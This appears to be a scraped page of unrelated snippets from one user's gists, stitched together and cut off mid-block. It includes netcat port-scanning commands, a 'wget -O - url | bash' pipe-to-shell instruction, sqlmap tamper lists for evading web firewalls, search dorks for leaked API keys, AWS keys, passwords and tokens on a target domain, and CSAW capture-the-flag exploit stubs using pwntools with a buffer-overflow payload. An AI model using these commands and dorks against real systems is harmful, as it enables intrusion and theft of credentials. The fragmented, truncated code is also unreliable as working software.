faidamine

----------------------------------------------------------------------------------------------------
(netcat or nc or ncat)

#Use Netcat as a Simple Web Server
vi index.html #make a simple HTML file
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888 #
http://server_IP:8888 #access the content,serve the page, and then the netcat connection will close
"while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done" #have netcat serve the page indefinitely by wrapping the last command in an infinite loop

netcat -z -v domain.com 1-1000 #scan all ports up to 1000

faidamine

#!/bin/bash

#
# Execute as wget -O - gist_url | bash
#
# Couldn't add gist url as, it changes after every update i.e. as soon as I save this, it's url will change :p
#
# It's debian based, so for centos and likewise you have to change apt to yum and similarly 
#
InstallationStartTime=$(date +%s)

faidamine

# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```

faidamine

import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass

faidamine

import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass

faidamine

import requests
import json
import sys
import argparse


_strip = ['http://', 'https://', 'www']

G = '\033[92m'
Y = '\033[93m'

faidamine

“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces

faidamine

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

faidamine

#!/bin/python

#Faid Mohammed Amine 
#Fb : piratuer
from pwn import *
import math


r = remote("misc.chal.csaw.io", 9002)
r.recvuntil("*"*82)

faidamine

#!/bin/python

#Faid Mohammed Amine 
#Fb : piratuer

from pwn import *

s = remote("pwn.chal.csaw.io",9000)
pld = "A"*20
pld += p32(0xcaf3baee)